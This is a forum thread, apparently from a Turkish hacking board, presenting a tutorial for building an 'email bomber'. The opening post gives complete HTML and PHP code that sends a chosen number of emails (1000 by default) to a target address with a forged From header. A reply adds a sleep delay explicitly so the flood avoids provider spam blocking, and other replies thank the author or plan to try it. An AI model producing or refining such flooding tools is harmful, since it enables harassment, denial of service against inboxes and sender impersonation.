Simple PHP & HTML | Email Bomber

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Seçkin Üye
Katılım
17 Mar 2020
Mesajlar
298
Tepki puanı
26
Ödüller
5
Yaş
27
6 HİZMET YILI
Hey guys it's Puddy i'm back with another tutorial.

I will be showing you how to make a simple email bomber.




Okay so things you will need:

1x Webhosting | Make sure you have SMTP >_> or it wont work
1x Little knowledge with php & html.
1x A text editor.

Okay so after you have all that we can get started!

1 : So first we will want to create a file called "index.html"

2 : We will place the following code in the index.html
Kod:
<html>
<head>
<title>Email Bomber</title>
</head>
<body>
  <center>
   <h1 style="color:white;font-shadow:0px 0px 2px blue;">Simple Email Bomber</h1><br>
         <!--This is where the forms starts-->
    <form action="email.php" method="post"><br>
        Email: <input type="text" name="email" /><br>
        Amount to send : <input type="text" name="spam" /><br>
        Subject: <input type="text" name="subject" /><br>
        Message: <TEXTAREA NAME="message" ROWS=6 COLS=40></TEXTAREA><br>
        From: <input type="text" name="from" /><br>
        <input type="submit" value="send" /><input type="reset" />
    </form>
   </center>
</body>
</html>
3 : Go ahead and save that file in a folder, name the folder what-ever you want.
4 : Now in that folder go ahead and create a file named "email.php"
5 : Now open the email.php and place the following code inside it.
Kod:
<?php

    $num = 1;
    $email = $_POST['email'];
    $spam = $_POST['spam'];
    $subject = $_POST['subject'];
    $message = $_POST['message'];
    $from = $_POST['from'];
    $send = $_POST['send'];
    if($spam==' ')
    {
      $spam = 1000; // this is for if the Amount to send = nothing then it will send 1000 emails
           // you can change it too what-ever you want.
    }


    if($spam!='' && $email=='')
    {
        die('Please enter an email!.');
    }

    if($email != '')
    {
        while($num<=$spam)
        {
            mail ($email, $subject, $message, "From: " . $from);
            echo $num . "<br>";
            $num++;
        }
    }
?>
7 : Now you can go ahead and upload it to your server, and boom
Also pls dont be a leecher
 
Moderatörün son düzenlenenleri:
Onaylı Üye
Katılım
11 Nis 2020
Mesajlar
52
Tepki puanı
6
Yaş
35
6 HİZMET YILI
I think major email sites like Gmail, Yahoo, and Hotmail will block these messages just for the fact that in your code I don't see a delay of any sorts. Remember these sites have sophisticated email blocking measures in place.
 
Banlı Üye
Katılım
10 Mar 2020
Mesajlar
2,030
Çözümler
57
Tepki puanı
375
6 HİZMET YILI
thnanks bro for this ! good work
 
Seçkin Üye
Katılım
9 Nis 2020
Mesajlar
319
Tepki puanı
20
Ödüller
4
Yaş
29
6 HİZMET YILI
How it works dont understand
 
Siren
Süper Üye
Katılım
20 Eyl 2018
Mesajlar
604
Çözümler
1
Tepki puanı
31
Ödüller
6
7 HİZMET YILI
it seems good but i see no delay there it will be blocked for sure
 
Onaylı Üye
Katılım
24 Nis 2020
Mesajlar
87
Tepki puanı
6
Yaş
29
6 HİZMET YILI
Try this in your while loop to make it better:


while($num<=$spam)
{
mail ($email, $subject, $message, "From: " . $from);
echo $num . "<br>";
$num++;
//add delay to make it work even better and avoid blocking
sleep(30) //sleep function will pause the flow control for defined seconds on the parameter
}
 
Beerus sama
Ultra Üye
Katılım
7 Şub 2020
Mesajlar
1,552
Çözümler
1
Tepki puanı
207
Ödüller
4
6 HİZMET YILI
i think ii will try this
 
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...